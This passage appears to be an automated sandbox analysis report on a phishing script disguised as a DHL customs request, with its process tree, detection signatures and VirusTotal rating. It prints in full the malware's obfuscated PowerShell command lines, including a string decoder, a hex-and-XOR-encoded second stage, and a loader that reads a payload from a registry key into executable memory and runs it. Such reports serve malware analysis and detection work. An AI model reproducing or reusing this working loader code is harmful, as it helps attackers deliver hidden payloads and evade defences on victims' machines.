DaApdLieSa9Ne;Cl`$PrTPyrOvy EkspsFda Kg Ss SpBoo Sr RtOmoLeeFon Us A0 w C=Om SHSiTEnBCo E'CoC O2NoC SAHeEag0ZaEUrASpEPaD bF ACSkF S4 TB R7HoC FB aEtwC HFUn7 UETrDPhFfr0 EFAr4TyFLeCInBSa7 PDBo0 OFHa7 CE UD BFFoCOkEReBkaF B6AcENo9NoC TADiFTiC BE NB CEStF CFpu0 OFRaA HFMiC CEUnAByBPa7UdD u4 IFMe8BoE QBMeERiAKoF A1ErFSk8HeF B5DaC F4 HA C3 HA F3FuD RA SF R6FeEPh9AkEBr0InBLi1UnBSmDNeDKa2 CF p8ShEPsBilE MA CFCa2 TF S8HeFInD MFlgC SBAs5 SBPa9DuA T9DeB A5 MB S9NiBEx9 EBFoD ACDyAApE L9 SFMe1GeFHeC SF YADeF J0BoE NCPlE LAEtAPrASeBOr5 SB B9OrAGrFSwA CDStAFl9SoB L0Ti'Vo;Je&No(Ca`$ TDKveMom Fy Rt Mh AocrlMeo rgCyi IzTaiTenBagCa7 O) S Ge`$AfTSurAnyAckLusKoaAfgTes GpAno PrCitTeo De BnDesSi0 B;Bl`$NoSFipRehUliIln Sg KiSmd IaaueOp6Sp2 P=Du`$ IKAta lrAms Fk Sa Qd PeCh. Bc AoBru Sn Ut S- C6Ge4Ov0Pa;Ta`$noT prCey PkWos ea Ug BsUnpEnoCer jtAroSieUanCusFo1De ca= C CrHJeT RBKo Br' TC R2InCStA kE p0RaEskANeE RDUnFMiCToF T4 SBKa7GrC KB SETaCFeF P7OdE mD MF A0 FF s4AlF dCGaB D7 AD U0HjF D7UnEUnDLoF BC IE GB FFfu6 BERi9CoC UADeF UC BEReBsaE TF SFBe0stFStA WF PCTiEAnA LB D7CyDLe4 NF H8 RE UB FEBiA DF T1KoFCo8 UFWa5 SC I4 RABe3PoAwi3UbD SAyoF T6BeE N9AmE H0AzB E1ReB ODTeD H2roF t8 NENyBSpESkA PFBi2DeFHa8GtFWoDGlF SCNyB S5AfBDi9 CA BFMrAMiD SAAn9 PB m5UnB H9 PBShDSoDCr8arFEk5 DE SALeFGy0 DFVuDKhF S0RuFUnE SFEn1 AF LCCoFhaDTaE RAmeFCl2VaEBlBEnFAl8AfEudFOvFkrCprE ODOpEFuA MB V5 BBSe9TrBToD vCBeA HEAf9InFSi1 KFmu0HjFTo7SeFunE PFbl0 HFNeDPrFKo8KrFNoC BA KF MA OB AB B0Un'Tr;Re& A( F`$ RDSveromPuyUntPrhGeo MlTaoFog UiTizlyiStnCag A7 d)Ro U`$HaT Arepy EkSrs faDrg CsQup Ao pr NtsooMae Nn Es R1Fo; H`$NoT KrDiy UkCas Ma FgUns Cp AoAfrLatdaoSaeExn FsTo2Un S= L DiH HTHuB S L' RB AD RCSuBToEAl0RhFsk7UdFRyA LFFr1LaF S6BaEAkAUfETu9TrFSl6AkE ZB PFMi8 SBBi9koA T4DeBIn9stCEn2 FCnuAKjENo0ReE SA DEBrDGaF CCFlFBi4 LBAn7 PCDaBZoEBaCplF U7 TE LDAfF M0 UFKo4 CF aCHjB I7UnDSk0 AFAm7ReE PD PF ACBeEJaB SFCh6PrEmu9 VCLoA NFwoC FEleB AE VFSlFud0 aFTeA FF DC SE SA SBPr7 BD S4PrFRi8 ME RB EEanASpFLa1 IFTr8 DFHy5KuCMa4 PA F3BiAPa3 SD SEDiFSnC UE FD HD DDFlF VC BF E5 RFFiCesFTjEMaFwi8ReEBaDViF TC SDtsF UF O6 DEFoBGrDSnF PENoC SFFo7 uF SA AEHjDpoF o0 CFLi6 DFBe7 RCSt9 AFAl6ToF o0HiFRo7 CE GD SFAmC ME hBDrBEp1 AB F1UnFThF HF R2PeEGi9LeB C9CoBCeDWoD SD bF B0AnETuADuE IAFrFAn6 NFLo7FaF SC UEChBSeF MCMoBSt9koBCaDTyC FAFjFBe8 LFFr7 IFepAMeEHaDSoF S6SkF D5BoF N6stFUrEEuEPo0UbB G0 GB U5 LB P9 TB s1 OD uE SDVeDGrCCaDKoBSe9 SDAn9abBWi1hnCZo2UdDac0 SFaf7SpEElDKrC T9NaESuD rE MB ACUn4TrB A5 MBJe9 ECEn2 UDKe0 AF M7 CESaD pC N9ErECaD BEExBReCJa4BiB C5SyB M9UnC U2 MDOu0PrF D7 PE CD RCTo9 VE HDErEEvBSiC A4 hBSc5AnB M9CoCCa2 PDOk0StF G7FlERuD dCRe9AfEKoDMiEStBOvC P4 EB E5OvB F9OmCAf2EmDBe0 HF T7CeE CDUdC I9 RECaD zE LB sCKa4 FBUd0ShB P9BlBEu1 DC C2PrD C0TrF E7 DE SDKrCSh9KsE TDSkEStBMaCCh4 BBHa0HaBQu0VaBIn0 R'Fo;Da&Ma( W`$ BDoveFum kySct ShWooWelReo Mg UiKozMai Pn AgPo7pn)Ra Wh`$UnTOvrSoy Nk CsAla SgLas OpFeoRer MtSto seQunbes H2 N;An`$DeT VrSty CkVis CakngRes Rplio Br LtDio Ce VnPrsUn3Im F=Al HyHUdTAlB C Ch'trBAnDMiCNaB LE I0upF P7PaFCoA AFRa1 BFKo6CyEMyA OELu9PeF B6 AE uBSkFch8 OBEk7 IDVo0 PF P7 TE PFPiFAf6AmFSp2 TFAmCStB F1 rBphDTrCKoA RE C9 AFAu1BaFUnCGoFTeAFeFCa0TrE TCFaEPoAStAAcA UBSk5DrB SDBiD O8PrFHo5 NE KANoF g0 CF LD HF B0 TFRuEslF O1ChFAnC SFReDReEEnASwFRe2 PE NB OF B8 CELaFChF FCKiEReD PEPoAPaB N5MuB FD fCBeB AF KC KFKoA EF P8EvF m7gtESpD TFCh8 VEDuD SFMi0 CF U6 FFHe7DuEInASpBOp5 CATu9PiBPe5SpACe9 IBOp0 K'in;Re& N( U`$FrD GeFumOvyAft ThSao Ul BoSag Si TzEniUnnElg K7 Q) D Ra`$unTBar KyKak ss ta IgLas CpFooUnr UtReoRee Sn ks I3Ma# R;""";Function Tryksagsportoens9 { param([String]$Potomato7); For($Anamnesis=2; $Anamnesis -lt $Potomato7.Length-1; $Anamnesis+=(2+1)){ $Topbetjentene = 'sub'+'string'; $Democrat = $Democrat + $photogalvanography + $Potomato7.$Topbetjentene.Invoke($Anamnesis, 1); } $Democrat;}$Lask0 = Tryksagsportoens9 ' VI uE DX M ';$Lask1= Tryksagsportoens9 $Uncolonizing;if([IntPtr]::size -eq 8){.$env:systemroot\S*64\W*Po*er*\*1.0\*ll.*xe $Lask1 ;}else{&$Lask0 $Lask1;};;; MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Potomato7); $Anamnesisnch = New-Object byte[] ($Potomato7.Length / 2); For($Anamnesis=0; $Anamnesis -lt $Potomato7.Length; $Anamnesis+=2){ $Dogberries = $Potomato7.Substring($Anamnesis, 2); $Anamnesisnch[$Anamnesis/2] = [convert]::ToByte($Dogberries, 16); $Anamnesisnch[$Anamnesis/2] = ($Anamnesisnch[$Anamnesis/2] -bxor 153); } [String][System.Text.Encoding]::ASCII.GetString($Anamnesisnch);}$Unaware0=HTB 'CAE0EAEDFCF4B7FDF5F5';$Unaware1=HTB 'D4F0FAEBF6EAF6FFEDB7CEF0F7AAABB7CCF7EAF8FFFCD7F8EDF0EFFCD4FCEDF1F6FDEA';$Unaware2=HTB 'DEFCEDC9EBF6FAD8FDFDEBFCEAEA';$Unaware3=HTB 'CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFF';$Unaware4=HTB 'EAEDEBF0F7FE';$Unaware5=HTB 'DEFCEDD4F6FDECF5FCD1F8F7FDF5FC';$Unaware6=HTB 'CBCDCAE9FCFAF0F8F5D7F8F4FCB5B9D1F0FDFCDBE0CAF0FEB5B9C9ECFBF5F0FA';$Unaware7=HTB 'CBECF7EDF0F4FCB5B9D4F8F7F8FEFCFD';$Unaware8=HTB 'CBFCFFF5FCFAEDFCFDDDFCF5FCFEF8EDFC';$Unaware9=HTB 'D0F7D4FCF4F6EBE0D4F6FDECF5FC';$Demythologizing0=HTB 'D4E0DDFCF5FCFEF8EDFCCDE0E9FC';$Demythologizing1=HTB 'DAF5F8EAEAB5B9C9ECFBF5F0FAB5B9CAFCF8F5FCFDB5B9D8F7EAF0DAF5F8EAEAB5B9D8ECEDF6DAF5F8EAEA';$Demythologizing2=HTB 'D0F7EFF6F2FC';$Demythologizing3=HTB 'C9ECFBF5F0FAB5B9D1F0FDFCDBE0CAF0FEB5B9D7FCEECAF5F6EDB5B9CFF0EBEDECF8F5';$Demythologizing4=HTB 'CFF0EBEDECF8F5D8F5F5F6FA';$Demythologizing5=HTB 'F7EDFDF5F5';$Demythologizing6=HTB 'D7EDC9EBF6EDFCFAEDCFF0EBEDECF8F5D4FCF4F6EBE0';$Demythologizing7=HTB 'D0DCC1';$Demythologizing8=HTB 'C5';$Dissonere=HTB 'CCCADCCBAAAB';$Sanctology=HTB 'DAF8F5F5CEF0F7FDF6EEC9EBF6FAD8';function fkp {Param ($Allocyanine, $unsensualized) ;$Karskade0 =HTB 'BDCCF7EBFCE9EBF6EFFCFDB9A4B9B1C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DEFCEDD8EAEAFCF4FBF5F0FCEAB1B0B9E5B9CEF1FCEBFCB4D6FBF3FCFAEDB9E2B9BDC6B7DEF5F6FBF8F5D8EAEAFCF4FBF5E0DAF8FAF1FCB9B4D8F7FDB9BDC6B7D5F6FAF8EDF0F6F7B7CAE9F5F0EDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA1B0C2B4A8C4B7DCE8ECF8F5EAB1BDCCF7F8EEF8EBFCA9B0B9E4B0B7DEFCEDCDE0E9FCB1BDCCF7F8EEF8EBFCA8B0';&($Demythologizing7) $Karskade0;$Karskade5 = HTB 'BDD2ECEBEFFCF5F8FCF7FEFDFCB9A4B9BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCABB5B9C2CDE0E9FCC2C4C4B9D9B1BDCCF7F8EEF8EBFCAAB5B9BDCCF7F8EEF8EBFCADB0B0';&($Demythologizing7) $Karskade5;$Karskade1 = HTB 'EBFCEDECEBF7B9BDD2ECEBEFFCF5F8FCF7FEFDFCB7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFC4B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D1F8F7FDF5FCCBFCFFB1B1D7FCEEB4D6FBF3FCFAEDB9D0F7EDC9EDEBB0B5B9B1BDCCF7EBFCE9EBF6EFFCFDB7DEFCEDD4FCEDF1F6FDB1BDCCF7F8EEF8EBFCACB0B0B7D0F7EFF6F2FCB1BDF7ECF5F5B5B9D9B1BDD8F5F5F6FAE0F8F7F0F7FCB0B0B0B0B5B9BDECF7EAFCF7EAECF8F5F0E3FCFDB0B0';&($Demythologizing7) $Karskade1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Twentythree,[Parameter(Position = 1)] [Type] $Professionalisation = [Void]);$Karskade2 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB9A4B9C2D8E9E9DDF6F4F8F0F7C4A3A3DAECEBEBFCF7EDDDF6F4F8F0F7B7DDFCFFF0F7FCDDE0F7F8F4F0FAD8EAEAFCF4FBF5E0B1B1D7FCEEB4D6FBF3FCFAEDB9CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7D8EAEAFCF4FBF5E0D7F8F4FCB1BDCCF7F8EEF8EBFCA1B0B0B5B9C2CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7DCF4F0EDB7D8EAEAFCF4FBF5E0DBECF0F5FDFCEBD8FAFAFCEAEAC4A3A3CBECF7B0B7DDFCFFF0F7FCDDE0F7F8F4F0FAD4F6FDECF5FCB1BDCCF7F8EEF8EBFCA0B5B9BDFFF8F5EAFCB0B7DDFCFFF0F7FCCDE0E9FCB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA9B5B9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEA8B5B9C2CAE0EAEDFCF4B7D4ECF5EDF0FAF8EAEDDDFCF5FCFEF8EDFCC4B0';&($Demythologizing7) $Karskade2;$Karskade3 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DDFCFFF0F7FCDAF6F7EAEDEBECFAEDF6EBB1BDCCF7F8EEF8EBFCAFB5B9C2CAE0EAEDFCF4B7CBFCFFF5FCFAEDF0F6F7B7DAF8F5F5F0F7FEDAF6F7EFFCF7EDF0F6F7EAC4A3A3CAEDF8F7FDF8EBFDB5B9BDCDEEFCF7EDE0EDF1EBFCFCB0B7CAFCEDD0F4E9F5FCF4FCF7EDF8EDF0F6F7DFF5F8FEEAB1BDCCF7F8EEF8EBFCAEB0';&($Demythologizing7) $Karskade3;$Karskade4 = HTB 'BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DDFCFFF0F7FCD4FCEDF1F6FDB1BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEABB5B9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEAAB5B9BDC9EBF6FFFCEAEAF0F6F7F8F5F0EAF8EDF0F6F7B5B9BDCDEEFCF7EDE0EDF1EBFCFCB0B7CAFCEDD0F4E9F5FCF4FCF7EDF8EDF0F6F7DFF5F8FEEAB1BDCCF7F8EEF8EBFCAEB0';&($Demythologizing7) $Karskade4;$Karskade5 = HTB 'EBFCEDECEBF7B9BDCDFCF5FCE1E9EBF6FEEBF8F4F4FCEDA8A1ADB7DAEBFCF8EDFCCDE0E9FCB1B0';&($Demythologizing7) $Karskade5 ;}$Wendys = HTB 'F2FCEBF7FCF5AAAB';$Karskade6 = HTB 'BDCCFDF4F8F7EFEBFCEBFCEAB9A4B9C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DEFCEDDDFCF5FCFEF8EDFCDFF6EBDFECF7FAEDF0F6F7C9F6F0F7EDFCEBB1B1FFF2E9B9BDCEFCF7FDE0EAB9BDDDFCF4E0EDF1F6F5F6FEF0E3F0F7FEADB0B5B9B1DEDDCDB9D9B1C2D0F7EDC9EDEBC4B5B9C2CCD0F7EDAAABC4B5B9C2CCD0F7EDAAABC4B5B9C2CCD0F7EDAAABC4B0B9B1C2D0F7EDC9EDEBC4B0B0B0';&($Demythologizing7) $Karskade6;$Recantations = fkp $Demythologizing5 $Demythologizing6;$Karskade7 = HTB 'BDCAE9F1FCFAF0ECEAAAB9A4B9BDCCFDF4F8F7EFEBFCEBFCEAB7D0F7EFF6F2FCB1C2D0F7EDC9EDEBC4A3A3C3FCEBF6B5B9AFADA9B5B9A9E1AAA9A9A9B5B9A9E1ADA9B0';&($Demythologizing7) $Karskade7;$Karskade8 = HTB 'BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB9A4B9BDCCFDF4F8F7EFEBFCEBFCEAB7D0F7EFF6F2FCB1C2D0F7EDC9EDEBC4A3A3C3FCEBF6B5B9ABAAACADAAA1A9A1B5B9A9E1AAA9A9A9B5B9A9E1ADB0';&($Demythologizing7) $Karskade8;$Tryksagsportoens=(Get-ItemProperty -Path 'HKCU:\luftkastellernes\Isobutyric54').Meaningfully;$Karskade9 = HTB 'BDD2F8EBEAF2F8FDFCB9A4B9C2CAE0EAEDFCF4B7DAF6F7EFFCEBEDC4A3A3DFEBF6F4DBF8EAFCAFADCAEDEBF0F7FEB1BDCDEBE0F2EAF8FEEAE9F6EBEDF6FCF7EAB0';&($Demythologizing7) $Karskade9;$Tryksagsportoens0 = HTB 'C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DAF6E9E0B1BDD2F8EBEAF2F8FDFCB5B9A9B5B9B9BDCAE9F1FCFAF0ECEAAAB5B9AFADA9B0';&($Demythologizing7) $Tryksagsportoens0;$Sphingidae62=$Karskade.count-640;$Tryksagsportoens1 = HTB 'C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DAF6E9E0B1BDD2F8EBEAF2F8FDFCB5B9AFADA9B5B9BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB5B9BDCAE9F1F0F7FEF0FDF8FCAFABB0';&($Demythologizing7) $Tryksagsportoens1;$Tryksagsportoens2 = HTB 'BDCBE0F7FAF1F6EAE9F6EBF8B9A4B9C2CAE0EAEDFCF4B7CBECF7EDF0F4FCB7D0F7EDFCEBF6E9CAFCEBEFF0FAFCEAB7D4F8EBEAF1F8F5C4A3A3DEFCEDDDFCF5FCFEF8EDFCDFF6EBDFECF7FAEDF0F6F7C9F6F0F7EDFCEBB1B1FFF2E9B9BDDDF0EAEAF6F7FCEBFCB9BDCAF8F7FAEDF6F5F6FEE0B0B5B9B1DEDDCDB9D9B1C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B5B9C2D0F7EDC9EDEBC4B0B9B1C2D0F7EDC9EDEBC4B0B0B0';&($Demythologizing7) $Tryksagsportoens2;$Tryksagsportoens3 = HTB 'BDCBE0F7FAF1F6EAE9F6EBF8B7D0F7EFF6F2FCB1BDCAE9F1FCFAF0ECEAAAB5BDD8F5EAF0FDF0FEF1FCFDEAF2EBF8EFFCEDEAB5BDCBFCFAF8F7EDF8EDF0F6F7EAB5A9B5A9B0';&($Demythologizing7) $Tryksagsportoens3# MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

  • AV Detection
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: DHL-CUSTOMS-REQUEST-802487487001.vbsVirustotal: Detection: 8%Perma Link

System Summary

barindex
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDz
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Uncolonizing = """ SFKluRenprc Ttloi Ho AnFi MaH LT PB L Ba{Qu Ra Su Au Rp Ba Ar Aa KmAs( G[ OSTht Ir TiDin Wg B] T`$ sPReoSotWooPomcaaMot KoDi7sk) L; M S He M Ud`$TeA EnBgaSlm RnTreUnsFaiSksImn Bc Bh D Tr=Ch MaNKaeanwDr- UOTib ljYee PcSotPr TbSpy It LePh[ C]di m( S`$SeP Bo jtSooCumTaaHutbeoSk7El.DiLHae UnEngFlt FhKr B/Le Ur2 H) S; K Br El D DiFBeo Er P(Al`$roA Tn KaElmUpn YeRasSki CsUb= M0 C; C Au`$CaAHenPaaThmPsnKoeUdsGai XsDe Ex-Val Bt R C`$spPFnoAut coAfmCoaTjtLnoUl7Be. SL Ge HnLygCutCih B; B Cr`$FoAMin Aa ImMen KeZas Ui Rs O+Ec=Bu2Mi)Ke{ P Vi Un`$caD Bo Cg Ab Fe ArWir Ri Me Ds O U= C F`$ SP CobotIdo um SaCetBuo S7Op.YiS MuUnb NsRetReropi CnUtgRe(Sc`$ RASen HaComFan de FssqisusUn, F A2 R) K;El Bo M F De pa B Di Pe`$RiA un Ba Im In Ae AsthiNasHonlsc Dh S[Re`$NaA Gn SatemNan Se FsEni LsPl/ P2 S] G Vo=Va Ud[ PcDuo UnkivExeUnrMetSk]fl: O: STreospBBayAstTeePs( L`$OrDpaoobgStbDee ErTirEri ReexsCa, F Fo1Co6Su)Li; n Vi Tr`$DaAtenCha AmIrnReePosUriHes BnEucDjhMu[Ch`$FdA Bn Sa PmAbn DekisIniDys R/ I2 L]Ga Il= B J(Be`$ NAPrnPaa Um Fn VeUlsLii GsUnn AcFrh U[Mi`$ fA OnStaHum Nn ge Fsupi RsPo/Su2An] S Hy- Pb RxIgoWerSi W1Fo5Ov3 M) E;Gy S Vo T Mo} c Me[ ES GtRurSai GnCog F]En[SpSEkyGrsRet ReRemPi.HvT VeZlxBlt A. PE RnNocTuo mdNaiMan SgSp]ma:Pr: PAGeS SCSuIAeI K. cGFoeDrt US StCrr gi Sn SgSl( T`$ BA HnSuaRem Fn Ne ds Ci DsDenDecOvh h) L;Wh}Tu`$BeUBan Ua OwKlaRorSieAd0No=TiHFaTArB s Co'koCDeA BEar0FoE TA TEPoDJaF SCleF K4reBse7opFSuD TFsc5StFKu5Bs'Bo; M`$ReUTanIna SwCea Ir ieBo1 I=beH JT KBCa St'ArDCa4 MF M0 NFmiA TECaB SFSa6AuE PA BFRu6MaFswFFaE cD HBHe7unCGeEHiF D0FaFTi7 fA MACaA UB CBHk7 FC SCJeFpy7 DE CAVeFTu8 PFSpFImFBiC ODPl7FoFgl8SeE JD WFHi0BjEKlFPsF SCPrD S4 MF ICPrEAmD SFKo1MiF F6ChF SDHeE aAAg' S;fo`$ DU Cn HaCaw Da Sr Ce O2Co= MH RT ABMe m' ND pEPsF UC MEKrD EC K9InETaB HF O6 IF SALeDMi8SpFYdD SFslDAiEMeBAaFFoCHuEAnABrETrARe'Un;St`$InU HnVia SwFlajer Re B3 R= EHReTSpBFo P'HjC UAbaEsi0 TE EA KE BD PF jC UF A4ClB S7 SC SBBiEstC BFLa7hoESkDbjFpr0RuFMo4ReF SCOmBCo7 sDAs0DeFCa7 eEOvD TF PCFiEKuBpaFdi6CiE S9BrC CA FFLoCTyE WB GENeFbrF T0LuFVuA TF fCapE KA SBNo7urD T1 SFEl8EnF K7 NFmlD FFMi5PlFInCBaCAfBSkF NC BF SF a' C;Be`$toUUnn PaSuw baDarAue A4ra=LiHHyT BBSe S' BEUlAViEGoD mEMiBArF D0ScF R7omFRaE B' T;no`$ CUPenNia gw iaTurMeeAv5 G=krHBnT SBRe St'slD EEMaFJaC FESaDSaD A4 LF i6 BFVaDAlEHeCStFUd5AbFFoCLlD o1ImFst8NoFGe7RaF SD SFul5FiF SC F' S;Ad`$hiU Bn KaOpwTua Pr Mepo6Sp=SmHCoTEnB L E' AC eBMeCKiD UC SA TEFa9 AFprC AFPrAStFAt0SoFSe8 WFGi5CoDUn7 RFCo8 MFRe4 AF LCTeBSc5BrBGa9AnDTa1KlFSt0 RFBeD DFTaC ID FB SE U0 KC SA OFMa0 BFTrEDeBNy5 TB b9DeCOx9UvE SCMeFWaB FFPi5RnFSc0PrFDjA B'Bn; E`$ SU DnDkaCowHoa Sr BeBl7Se= FHMeTCoB S H'SpCKaBSkE lC SF f7 FEApD IFOr0 LFAs4GaFAuCSaB p5 YBad9 BD S4PeFAd8UdFLi7AgFAl8TeF OEAnF MCHvFNoDAf' P; F`$CeUWenRea MwDia Fr DeMo8En=ArHmaT SBSk Ce'AnC AB RFTcC KFCoFDmFTa5 MFSeCcaFDjA UEPsDzJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20867
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6802
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20867Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6802Jump to behavior
Source: DHL-CUSTOMS-REQUEST-802487487001.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF9A7D10CA81_2_00007FF9A7D10CA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: DHL-CUSTOMS-REQUEST-802487487001.vbsVirustotal: Detection: 8%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
